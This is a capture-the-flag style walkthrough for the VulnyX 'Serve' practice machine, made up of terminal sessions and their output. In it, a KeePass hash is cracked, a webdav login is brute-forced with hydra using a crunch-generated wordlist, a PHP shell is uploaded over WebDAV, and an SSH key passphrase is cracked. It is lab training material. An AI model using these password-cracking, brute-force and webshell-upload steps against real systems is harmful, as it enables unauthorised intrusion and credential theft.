靶场练习-vulnyx：Serve

┌──(root㉿kali)-[~/Downloads]

└─# keepass2john db.kdbx > db.hash

┌──(root㉿kali)-[~/Downloads]

└─# john db.hash --wordlist=/usr/share/wordlists/rockyou.txt 

Using default input encoding: UTF-8

Loaded 1 password hash (KeePass [SHA256 AES 32/64])

Cost 1 (iteration count) is 60000 for all loaded hashes

Cost 2 (version) is 2 for all loaded hashes

Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes

Will run 4 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

dreams           (db)     

1g 0:00:00:05 DONE (2024-05-23 09:26) 0.1709g/s 112.1p/s 112.1c/s 112.1C/s sunshine1..sweetpea

Use the "--show" option to display all of the cracked passwords reliably

Session completed.

┌──(root㉿kali)-[~/Downloads]

└─# crunch 9 9 -t w3bd4v%%% -o dic_teo.txt

Crunch will now generate the following amount of data: 10000 bytes

0 MB

0 GB

0 TB

0 PB

Crunch will now generate the following number of lines: 1000 

crunch: 100% completed generating output

┌──(root㉿kali)-[~/Downloads]

└─# hydra -l admin -P dic_teo.txt -f 192.168.1.147 http-get /webdav -v -I

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 09:51:27

[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task

[DATA] attacking http-get://192.168.1.147:80/webdav

[VERBOSE] Resolving addresses ... [VERBOSE] resolving done

[80][http-get] host: 192.168.1.147   login: admin   password: w3bd4v513

[STATUS] attack finished for 192.168.1.147 (valid pair found)

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 09:51:32

┌──(root㉿kali)-[~]

└─# curl -X PUT --upload-file shell.php http://192.168.1.147/webdav/ --digest -u admin:w3bd4v513

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>201 Created</title>

</head><body>

<h1>Created</h1>

<p>Resource /webdav/shell.php has been created.</p>

<hr />

<address>Apache/2.4.38 (Debian) Server at 192.168.1.147 Port 80</address>

</body></html>

┌──(root㉿kali)-[~]

└─# ssh2john id > id_rsa.hash                 

┌──(root㉿kali)-[~]

└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt 

Using default input encoding: UTF-8

Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])

Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes

Cost 2 (iteration count) is 2 for all loaded hashes

Will run 4 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

private          (id)     

1g 0:00:00:00 DONE (2024-05-23 09:59) 50.00g/s 100800p/s 100800c/s 100800C/s melinda..jesusfreak

Use the "--show" option to display all of the cracked passwords reliably

Session completed.